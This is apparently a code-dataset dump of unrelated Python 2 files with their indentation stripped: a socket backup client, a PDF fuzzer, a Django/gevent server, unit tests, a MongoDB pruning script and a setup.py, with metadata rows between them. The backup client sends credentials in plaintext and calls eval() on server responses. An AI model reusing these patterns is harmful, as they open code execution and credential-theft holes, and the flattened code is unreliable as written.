with open(x, 'rb') as f:
self.files[x] = hash(f.read())
if not os.path.exists(x) and x in self.files:
self.delete(x)
del self.files[x]
for x,y,z in os.walk(os.getcwd()):
for d in y:
direc = x.strip(os.getcwd())+"/"+d
direc = direc.strip("/")
if direc not in self.dirs:
self.dirs.append(direc)
if direc not in dir:
self.senddir(direc)
for f in z:
file_c = x +"/"+ f
file_c = file_c.replace(os.getcwd(), '').strip("/")
if file_c == sys.argv[0]:
continue
if file_c in self.files and file_c not in file:
self.send(file_c)
elif file_c not in self.files and file_c not in file:
with open(file_c, 'rb') as f:
self.files[file_c] = hash(f.read())
self.send(file_c)
elif file_c in self.files and file_c in file:
with open(file_c, 'rb') as f:
if hash(f.read()) != self.files[file_c]:
self.send(file_c)
with open(file_c, 'rb') as f:
self.files[file_c] = hash(f.read())
except Exception, error:
print error
print "\n Could not connect to server, trying again."
time.sleep(1)
def senddir(self, direc):
senddir = socket.socket()
try:
senddir.connect((self.ip, self.port))
except:
print "Could not connect to server."
send = "senddir {0} {1} {2}".format(direc, self.username, self.password)
senddir.send(send)
senddir.close()
def list(self):
list = socket.socket()
try:
list.connect((self.ip, self.port))
except:
print "Could not connect to server."
send = "list {0} {1}".format(self.username, self.password)
list.send(send)
data = ''
while True:
d = list.recv(1024)
data = data + d
if not d:
break
return data
list.close()
def send(self, file):
print "sending", file
send = socket.socket()
send.connect((self.ip, self.port))
sends = "send {0} {1} {2}\r\n\r\n".format(file, self.username, self.password)
send.send(sends)
with open(file, 'rb') as file_:
for x in file_.readlines():
send.send(x)
print "Done sending", file
send.close()
def get(self, file):
print "Downloading", file
get = socket.socket()
try:
get.connect((self.ip, self.port))
except:
print "Could not connect to server"
send = "get {0} {1} {2}".format(file, self.username, self.password)
get.send(send)
with open(file, 'wb') as name:
while True:
data = get.recv(1024)
if not data:
print "Done downloading", file
get.close()
break
name.write(data)
def delete(self, file):
if file == sys.argv[0]:
print "You can not delete Ionic Backup Client"
else:
try:
os.remove(file)
except:
print "File doesn't exist"
delete = socket.socket()
try:
delete.connect((self.ip, self.port))
except:
print "Could not connect to server."
send = "del {0} {1} {2}".format(file, self.username, self.password)
delete.send(send)
delete.close()
def delete_dir(self, file):
try:
os.rmdir(file)
except:
print "Directory doesn't exist"
deldir = socket.socket()
try:
deldir.connect((self.ip, self.port))
except:
print "Could not connect to server."
send = "deldir {0} {1} {2}".format(file, self.username, self.password)
deldir.send(send)
deldir.close()
def shell(ip, port, username, password):
while True:
cmd = raw_input("IonicShell> ")
if cmd == "help":
print """
rm <file> - Deletes a file on the server and locally.
rmdir <dir> - Deletes a directory on the server and locally.
ls - Returns all the files on the server.
"""
elif cmd.startswith("rm "):
cmd = cmd.split()[1]
IonicClient(ip, port, username, password).delete(cmd)
elif cmd.startswith("rmdir "):
cmd = cmd.split()[1]
IonicClient(ip, port, username, password).delete_dir(cmd)
elif cmd == "ls":
stuff = IonicClient(ip, port, username, password).list().split(":")
print "Directories: \n"+'\n'.join(eval(stuff[0]))
print "\n"
print "Files: \n"+'\n'.join(eval(stuff[1]))
if __name__ == "__main__":
try:
ip = sys.argv[1]
port = int(sys.argv[2])
except IndexError:
print "Usage: python client.py <ip> <port>"
else:
username = raw_input("Username: ")
password = getpass.getpass("Password: ")
thread.start_new_thread(shell, (ip, port, username, password))
IonicClient(ip, port, username, password).main()
UTF-8
Python
false
false
2,013
18,528,488,934,689
7a6929f42659f7250da041793911e80342ef94a9
975e70f89e54e91adc00f1028183011f6a9a37fd
/Software Debugging/fuzzing.py
5bae71e90f61335351740d89f3d47776f1bd18e9
[]
no_license
marceldallagnol/short-programs
https://github.com/marceldallagnol/short-programs
953ca21a71a0a1ada6c85e05ad416c8049983a28
9a5fd1f1f92d4789e43c81b8953cb9770a08e1b5
refs/heads/master
2021-05-27T23:03:32.965876
2012-09-15T23:42:28
2012-09-15T23:42:28
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from subprocess import call
from datetime import datetime
from random import randrange
from shutil import copy
for i in range(100000):
test = list(open('front_base.pdf','rb').read())
test[randrange(len(test))] = '%c' % randrange(256)
test = ''.join(test)
front = open('front.pdf', 'w')
front.write(test)
front.close()
call('pdftk front.pdf background back.pdf output out.pdf'.split())
copy('front.pdf', str(i) + '_' + str(datetime.now()))
print i
from __future__ import absolute_import
import logging
from django.core.handlers.wsgi import WSGIHandler as DjangoWSGIApp
from django.conf import settings
from gevent.wsgi import WSGIServer
import gevent
from .app import DirtApp
class DjangoApp(DirtApp):
log = logging.getLogger(__name__)
def setup(self):
self.application = DjangoWSGIApp()
if self.settings.DEBUG:
from werkzeug import DebuggedApplication
self.application = DebuggedApplication(self.application, evalex=True)
settings.get_api = self.settings.get_api
self.server = WSGIServer(self.settings.http_bind, self.application, log=None)
def serve_dirt_rpc(self):
""" Calls ``DirtApp.serve`` to start the RPC server, which lets callers
use the debug API. """
if getattr(self.settings, "bind_url", None) is None:
self.log.info("no `bind_url` specified; RPC server not starting.")
return
DirtApp.serve(self)
def serve(self):
self.api_thread = gevent.spawn(self.serve_dirt_rpc)
self.log.info("Starting server on http://%s:%s...", *self.settings.http_bind)
self.server.serve_forever()
def get_api(self, *args, **kwargs):
""" The DjangoApp returns an empty API object by default so that tab
completion of the API will work. Feel free to override this method.
"""
return object()
# Copyright 2004-2008 Roman Yakovenko.
# Distributed under the Boost Software License, Version 1.0. (See
# accompanying file LICENSE_1_0.txt or copy at
# http://www.boost.org/LICENSE_1_0.txt)
import os
import sys
import unittest
import fundamental_tester_base
from pyplusplus import code_creators
from pyplusplus.module_builder import call_policies
from pyplusplus import function_transformers as ft
impl_conv_code = \
"""
boost::python::implicitly_convertible< std::auto_ptr< %(from)s >, std::auto_ptr< %(to)s > >();
"""
register_sptr = \
"""
boost::python::register_ptr_to_python< %s >();
"""
class tester_t(fundamental_tester_base.fundamental_tester_base_t):
EXTENSION_NAME = 'transfer_ownership_old'
def __init__( self, *args ):
fundamental_tester_base.fundamental_tester_base_t.__init__(
self
, tester_t.EXTENSION_NAME
, *args )
def customize( self, mb ):
event_clss = mb.classes( lambda cls: cls.name in ( 'event_t', 'do_nothing_t' ) )
for cls in event_clss:
cls.exposed_class_type = cls.EXPOSED_CLASS_TYPE.WRAPPER
cls.held_type = 'std::auto_ptr< %s >' % cls.wrapper_alias
cls.add_registration_code( register_sptr % 'std::auto_ptr< %s >' % cls.decl_string, False )
cls.add_registration_code( impl_conv_code % { 'from' : cls.wrapper_alias
, 'to' : cls.decl_string }
, False)
for base in cls.recursive_bases:
if base.access_type == 'public':
cls.add_registration_code( #from class to its base
impl_conv_code % { 'from' : cls.decl_string
, 'to' : base.related_class.decl_string }
, False)
cls.add_registration_code( #from wrapper to clas base class
impl_conv_code % { 'from' : cls.wrapper_alias
, 'to' : base.related_class.decl_string }
, False)
simulator = mb.class_( 'simulator_t' )
simulator.mem_fun( 'get_event' ).call_policies \
= call_policies.return_internal_reference()
schedule = mb.mem_fun( 'schedule' )
schedule.add_transformation( ft.transfer_ownership(0), alias='schedule' )
def run_tests( self, module):
class py_event_t( module.event_t ):
def __init__( self, container ):
module.event_t.__init__( self )
self.container = container
def notify( self ):
print 'notify'
self.container.append( 1 )
print '1 was append'
print 'test started'
notify_data = []
simulator = module.simulator_t()
print 'simulator created'
event = py_event_t( notify_data )
print 'py_event_t created: ', id( event )
simulator.schedule( event )
print 'event was shceduled'
print 'event refcount: ', sys.getrefcount( event )
print 'simulator refcount: ', sys.getrefcount( simulator )
#~ del event
print 'event was deleted'
event = simulator.get_event()
print 'event was restored via saved reference in simulator: ', id( event )
print 'event refcount: ', sys.getrefcount( simulator.get_event() )
print 'call event.notify(): ', simulator.get_event().notify()
print 'call simulator.run()'
simulator.run()
self.failUnless( notify_data[0] == 1 )
def create_suite():
suite = unittest.TestSuite()
suite.addTest( unittest.makeSuite(tester_t))
return suite
def run_suite():
unittest.TextTestRunner(verbosity=2).run( create_suite() )
if __name__ == "__main__":
run_suite()
UTF-8
Python
false
false
2,010
15,350,213,132,505
bd3f846a51bf1c46eaec913cd7ebc30ca017236a
66fcdc7a97ad8979c8fddddf8a7d5ce0727bc486
/src/test.py
72bb5b157e814a3f3f6edaaa238ec4342b54c030
[
"MIT"
]
permissive
rflynn/radixtree
https://github.com/rflynn/radixtree
f61a4c74a7c7ba9704e5d539361b177b18d12273
398b71157e83e994c59fa88bcabfd8ebcac52017
refs/heads/master
2016-09-05T19:28:17.076752
2014-03-08T22:32:18
2014-03-08T22:32:18
3,547,109
1
0
null
null
null
null
null
null
null
null
null
null
null
null
null
# ex: set ts=4 et:
from radixtree import RadixTree, URLTree
RadixTree.test()
URLTree.test()
UTF-8
Python
false
false
2,014
13,099,650,268,405
bc115d46c27758e706498234519b250073c8c303
65ac1849fad78cc8effe46bf3aa6df0a8fb39058
/triangle/test.py
22dbd69a2be2264f9290439b7232db26c3e29638
[]
no_license
thylm55/ktpm2013
https://github.com/thylm55/ktpm2013
97d827ffcadc1acb770dba4e14caf5e5e76785ce
f7ea72368c4e8c2bd30681dff71766987ee75d1c
refs/heads/master
2016-09-06T11:04:47.768403
2013-10-19T17:30:06
2013-10-19T17:30:06
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
OUTPUT01 = 'equilateral triangle'
OUTPUT02 = 'isosceles right triangle'
OUTPUT03 = 'right triangle'
OUTPUT04 = 'isosceles triangle'
OUTPUT05 = 'triangle'
OUTPUT06 = 'not identified'
import unittest
import math
from triangle import detect_triangle
class TriangleTest(unittest.TestCase):
# classification test cases
# equilateral triangle
def test01a(self):
result = detect_triangle(3, 3, 3)
self.assertEqual(result, OUTPUT01)
def test01b(self):
result = detect_triangle(2**32-1, 2**32-1, 2**32-1)
self.assertEqual(result, OUTPUT01)
def test01c(self):
result = detect_triangle(1e-30, 1e-30, 1e-30)
self.assertEqual(result, OUTPUT01)
# isosceles right triangle
def test02a(self):
result = detect_triangle(2, 2, math.sqrt(8))
self.assertEqual(result, OUTPUT02)
def test02b(self):
result = detect_triangle(3, 3, math.sqrt(18))
self.assertEqual(result, OUTPUT02)
def test02c(self):
result = detect_triangle(4, 4, math.sqrt(32))
self.assertEqual(result, OUTPUT02)
def test02d(self):
result = detect_triangle(7, 7, math.sqrt(98))
self.assertEqual(result, OUTPUT02)
# right triangle
def test03a(self):
result = detect_triangle(3, 4, 5)
self.assertEqual(result, OUTPUT03)
def test03b(self):
result = detect_triangle(6, 5, math.sqrt(61))
self.assertEqual(result, OUTPUT03)
# isosceles triangle
def test04a(self):
result = detect_triangle(7, 7, 5)
self.assertEqual(result, OUTPUT04)
def test04b(self):
result = detect_triangle(2**32-1, 2**32-1, 4)
self.assertEqual(result, OUTPUT04)
def test04c(self):
result = detect_triangle(2**32-1, 2**32-1, 2**32-2)
self.assertEqual(result, OUTPUT04)
def test04d(self):
result = detect_triangle(2**32-1, 4, 2**32-1)
self.assertEqual(result, OUTPUT04)
def test04d(self):
result = detect_triangle(2**32-1, 4, 2**32-1)
self.assertEqual(result, OUTPUT04)
# triangle
def test05a(self):
result = detect_triangle(2, 3, 4)
self.assertEqual(result, OUTPUT05)
def test05b(self):
result = detect_triangle(2**32-1, 2**32-2, 2**32-3)
self.assertEqual(result, OUTPUT05)
def test05c(self):
result = detect_triangle(2**32-1, 2**32-2, 3)
self.assertEqual(result, OUTPUT05)
def test06a(self):
result = detect_triangle(1, 2, 3)
self.assertEqual(result, OUTPUT06)
# input test cases
def test07a(self):
result = detect_triangle(-2, 3, 4)
self.assertEqual(result, OUTPUT06)
def test07b(self):
result = detect_triangle(2, -3, 4)
self.assertEqual(result, OUTPUT06)
def test07c(self):
result = detect_triangle(2, 3, -4)
self.assertEqual(result, OUTPUT06)
def test08a(self):
result = detect_triangle("a", 3, 4)
self.assertEqual(result, OUTPUT06)
def test08b(self):
result = detect_triangle(2, "math.sqrt(2)", 4)
self.assertEqual(result, OUTPUT06)
def test08c(self):
result = detect_triangle(2, 3, "2**32-1")
self.assertEqual(result, OUTPUT06)
def test09a(self):
result = detect_triangle()
self.assertEqual(result, OUTPUT06)
def test09b(self):
result = detect_triangle(2)
self.assertEqual(result, OUTPUT06)
def test09c(self):
result = detect_triangle(2, 3)
self.assertEqual(result, OUTPUT06)
def test10a(self):
result = detect_triangle(0, 0, 0)
self.assertEqual(result, OUTPUT06)
def test10b(self):
result = detect_triangle(0, 3, 4)
self.assertEqual(result, OUTPUT06)
def test10c(self):
result = detect_triangle(2, 0, 4)
self.assertEqual(result, OUTPUT06)
def test10d(self):
result = detect_triangle(2, 3, 0)
self.assertEqual(result, OUTPUT06)
# run test
if __name__ == '__main__':
unittest.main()
UTF-8
Python
false
false
2,013
19,670,950,233,002
0ce4b762cba8c0ef8a7780daa575967c655eb588
119efda3f0af227958aa9b14e7ea1687453cdf10
/kv15/kv15messages.py
04f2c35e035bc97d234b91858f87473f4131d53b
[]
no_license
sven4all/openebs
https://github.com/sven4all/openebs
9c48fec296973df6f70ccd94259d09c629c69558
f0abbda96b83cb71f323aceaec777a95c01d09f8
refs/heads/master
2021-01-17T21:47:54.863980
2012-12-10T01:16:41
2012-12-10T01:16:41
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from io.push import Push
class KV15messages:
def __init__(self, stopmessages = None):
if stopmessages is None:
self.stopmessages = []
else:
self.stopmessages = stopmessages
def __str__(self):
xml = """ <KV15messages>\n"""
for stopmessage in self.stopmessages:
xml += str(stopmessage)
xml += """ </KV15messages>"""
return xml
def push(self, remote, path):
return Push(dossiername='KV15messages', content = str(self), namespace='http://bison.connekt.nl/tmi8/kv15/msg').push(remote, path)
UTF-8
Python
false
false
2,012
15,453,292,358,713
fe0087481c31804abcdacecfb9846e35607f1760
3967090c44cba1a77dd573ac1b16566ccbdfc5d7
/utilities/prunefiles.py
09cdd6ac92c66e41827f2c946bbfd73fac6c4dcc
[]
no_license
cgperschon/slickqa
https://github.com/cgperschon/slickqa
c0e79656b4352140b4ef6a31bc32415a4352b94f
6eae7361da4a95ab22377edf9d1349295d248982
refs/heads/master
2021-01-01T17:15:56.475399
2014-02-05T19:49:34
2014-02-05T19:49:34
35,633,779
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python
__author__ = 'jcorbett'
import argparse
import pymongo
import sys
from gridfs import GridFS
def main(arguments):
parser = argparse.ArgumentParser(description='Remove files from a set of results.')
parser.add_argument("-p", "--project", dest="project", required=True, help="The project to prune files from")
parser.add_argument("-r", "--release", dest="release", required=True, help="The release of the project to prune files from.")
options = parser.parse_args(args=arguments)
connection = pymongo.Connection()
db = connection['slickij']
gridfs = GridFS(db)
project = db.projects.find_one({'name': options.project})
if project is None:
print "There is no project with the name", options.project
sys.exit(1)
release = None
for possible in project['releases']:
if possible['name'] == options.release:
release = possible
break
else:
print "There is no release with the name", options.release
sys.exit(1)
number_of_results = db.results.find({'release.releaseId': release['id']}).count()
print "There are", number_of_results, "results in that release."
resultnum = 0
for result in db.results.find({'release.releaseId': release['id']}):
sys.stdout.write("{:.2f}%\r".format(((float(resultnum) / number_of_results) * 100)))
sys.stdout.flush()
resultnum += 1
if 'files' in result:
for fileref in result['files']:
fileobj = db[fileref.collection].find_one(fileref.id)
gridfs.delete(fileref.id)
print "Done Removing files from", number_of_results, "results."
print "Removing file references from the results."
db.results.update({'release.releaseId': release['id']}, {"$unset": {"": 1}}, False, True)
print "Done."
if __name__ == '__main__':
main(sys.argv[1:])
import os
from setuptools import setup
# Utility function to read the README file.
# Used for the long_description. It's nice, because now 1) we have a top level
# README file and 2) it's easier to type in the README file than to put a raw
# string in below ...
def read(fname):
return open(os.path.join(os.path.dirname(__file__), fname)).read()
setup(
name = "django-file-repository",
version = "0.2b",
author = "Oscar Carballal Prego",
author_email = "[email protected]",
description = ("Simple file repository with public/private files, tags and categories."),
license = "GPLv3",
keywords = "repository tagging categorization file",
url = "http://github.com/cidadania/django-file-repository",
packages=['repository'],
long_description=read('README'),
classifiers=[
"Development Status :: 4 - Beta/Testing",
"Topic :: Web Utilities",
"Framework :: Django 1.4.5",
"License :: OSI Approved :: GPLv3 License",
"Operating System :: OS Independent",
"Natural Language :: English",
"Natural Language :: Spanish",
"Dependencies :: django-registration, django-taggit",
"Intended Audience :: Everyone",
],
)
UTF-8
Python
false
false
2,014
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.